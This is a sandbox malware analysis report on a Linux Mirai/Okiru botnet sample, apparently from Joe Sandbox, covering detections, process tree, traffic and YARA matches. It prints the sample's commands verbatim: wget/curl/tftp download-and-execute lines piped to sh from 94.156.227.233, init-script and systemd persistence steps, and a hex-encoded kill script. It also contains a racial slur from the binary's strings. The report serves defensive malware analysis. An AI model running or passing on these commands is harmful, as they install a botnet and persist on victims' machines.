Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:x86_64.nn.elf
Analysis ID:1574207
MD5:adf6b23cac984a3a3904655c9b93e95d
SHA1:6b3eb5ca916435b936af388d0455cc67d40c8ef8
SHA256:22edd9ca7bb64abffb6ff297dafad627e552a8922c3c442ae81643e828fb0dfe
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1574207
Start date and time:2024-12-13 04:22:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.nn.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/9@0/0
Command:/tmp/x86_64.nn.elf
PID:6255
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_64.nn.elf (PID: 6255, Parent: 6179, MD5: adf6b23cac984a3a3904655c9b93e95d) Arguments: /tmp/x86_64.nn.elf
    • sh (PID: 6272, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6278, Parent: 6272)
      • systemctl (PID: 6278, Parent: 6272, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6304, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6306, Parent: 6304)
      • chmod (PID: 6306, Parent: 6304, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6307, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6308, Parent: 6307)
      • ln (PID: 6308, Parent: 6307, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6309, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 6310, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 6311, Parent: 6310)
      • chmod (PID: 6311, Parent: 6310, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 6312, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6313, Parent: 6312)
      • mkdir (PID: 6313, Parent: 6312, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6314, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 6315, Parent: 6314)
      • ln (PID: 6315, Parent: 6314, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 6265, Parent: 799)
  • dumpe2fs (PID: 6265, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6291, Parent: 6290)
  • snapd-env-generator (PID: 6291, Parent: 6290, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6329, Parent: 799)
  • dumpe2fs (PID: 6329, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6405, Parent: 799)
  • dumpe2fs (PID: 6405, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6425, Parent: 799)
  • dumpe2fs (PID: 6425, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6426, Parent: 799)
  • dumpe2fs (PID: 6426, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6428, Parent: 799)
  • dumpe2fs (PID: 6428, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6429, Parent: 799)
  • dumpe2fs (PID: 6429, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6430, Parent: 799)
  • dumpe2fs (PID: 6430, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6431, Parent: 799)
  • dumpe2fs (PID: 6431, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86_64.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_64.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86_64.nn.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x105a4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      x86_64.nn.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x10d93:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      x86_64.nn.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xcd9e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xd05c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      6316.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6316.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6316.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0x105a4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6316.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x10d93:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          6316.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
          • 0xcd9e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          • 0xd05c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          Click to see the 45 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86_64.nn.elfAvira: detected
          Source: x86_64.nn.elfVirustotal: Detection: 39%Perma Link
          Source: x86_64.nn.elfReversingLabs: Detection: 42%
          Source: x86_64.nn.elfJoe Sandbox ML: detected
          Source: x86_64.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
          Source: x86_64.nn.elfString: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"
          Source: global trafficTCP traffic: 192.168.2.23:60018 -> 94.156.227.234:38242
          Source: global trafficTCP traffic: 192.168.2.23:39008 -> 154.216.19.139:199
          Source: /tmp/x86_64.nn.elf (PID: 6255)Socket: 0.0.0.0:38242Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: unknownTCP traffic detected without corresponding DNS query: 205.181.36.236
          Source: unknownTCP traffic detected without corresponding DNS query: 45.126.195.192
          Source: unknownTCP traffic detected without corresponding DNS query: 156.144.18.206
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
          Source: unknownTCP traffic detected without corresponding DNS query: 103.196.5.144
          Source: unknownTCP traffic detected without corresponding DNS query: 111.125.55.91
          Source: unknownTCP traffic detected without corresponding DNS query: 62.225.116.100
          Source: unknownTCP traffic detected without corresponding DNS query: 52.84.118.146
          Source: unknownTCP traffic detected without corresponding DNS query: 73.218.255.124
          Source: unknownTCP traffic detected without corresponding DNS query: 223.38.1.80
          Source: unknownTCP traffic detected without corresponding DNS query: 219.241.165.108
          Source: unknownTCP traffic detected without corresponding DNS query: 216.250.19.190
          Source: unknownTCP traffic detected without corresponding DNS query: 6.211.13.65
          Source: unknownTCP traffic detected without corresponding DNS query: 213.55.245.14
          Source: unknownTCP traffic detected without corresponding DNS query: 215.52.26.4
          Source: unknownTCP traffic detected without corresponding DNS query: 9.129.94.122
          Source: unknownTCP traffic detected without corresponding DNS query: 47.141.90.29
          Source: unknownTCP traffic detected without corresponding DNS query: 28.27.182.234
          Source: unknownTCP traffic detected without corresponding DNS query: 53.236.44.244
          Source: unknownTCP traffic detected without corresponding DNS query: 116.88.3.27
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 167.167.140.221
          Source: unknownTCP traffic detected without corresponding DNS query: 18.242.255.3
          Source: unknownTCP traffic detected without corresponding DNS query: 204.76.192.171
          Source: unknownTCP traffic detected without corresponding DNS query: 122.159.244.47
          Source: unknownTCP traffic detected without corresponding DNS query: 191.141.13.246
          Source: unknownTCP traffic detected without corresponding DNS query: 35.38.189.105
          Source: unknownTCP traffic detected without corresponding DNS query: 205.181.36.236
          Source: unknownTCP traffic detected without corresponding DNS query: 45.126.195.192
          Source: unknownTCP traffic detected without corresponding DNS query: 156.144.18.206
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
          Source: unknownTCP traffic detected without corresponding DNS query: 103.196.5.144
          Source: unknownTCP traffic detected without corresponding DNS query: 111.125.55.91
          Source: unknownTCP traffic detected without corresponding DNS query: 62.225.116.100
          Source: unknownTCP traffic detected without corresponding DNS query: 52.84.118.146
          Source: unknownTCP traffic detected without corresponding DNS query: 73.218.255.124
          Source: unknownTCP traffic detected without corresponding DNS query: 223.38.1.80
          Source: unknownTCP traffic detected without corresponding DNS query: 219.241.165.108
          Source: unknownTCP traffic detected without corresponding DNS query: 216.250.19.190
          Source: unknownTCP traffic detected without corresponding DNS query: 215.52.26.4
          Source: unknownTCP traffic detected without corresponding DNS query: 47.141.90.29
          Source: unknownTCP traffic detected without corresponding DNS query: 6.211.13.65
          Source: unknownTCP traffic detected without corresponding DNS query: 116.88.3.27
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 204.76.192.171
          Source: unknownTCP traffic detected without corresponding DNS query: 28.27.182.234
          Source: unknownTCP traffic detected without corresponding DNS query: 53.236.44.244
          Source: unknownTCP traffic detected without corresponding DNS query: 9.129.94.122
          Source: unknownTCP traffic detected without corresponding DNS query: 18.242.255.3
          Source: unknownTCP traffic detected without corresponding DNS query: 167.167.140.221
          Source: x86_64.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
          Source: x86_64.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
          Source: x86_64.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
          Source: x86_64.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
          Source: Initial sampleString containing 'busybox' found: usage: busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
          Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
          Source: Initial sampleString containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: /tmp/x86_64.nn.elf (PID: 6326)SIGKILL sent: pid: 6316, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6327)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
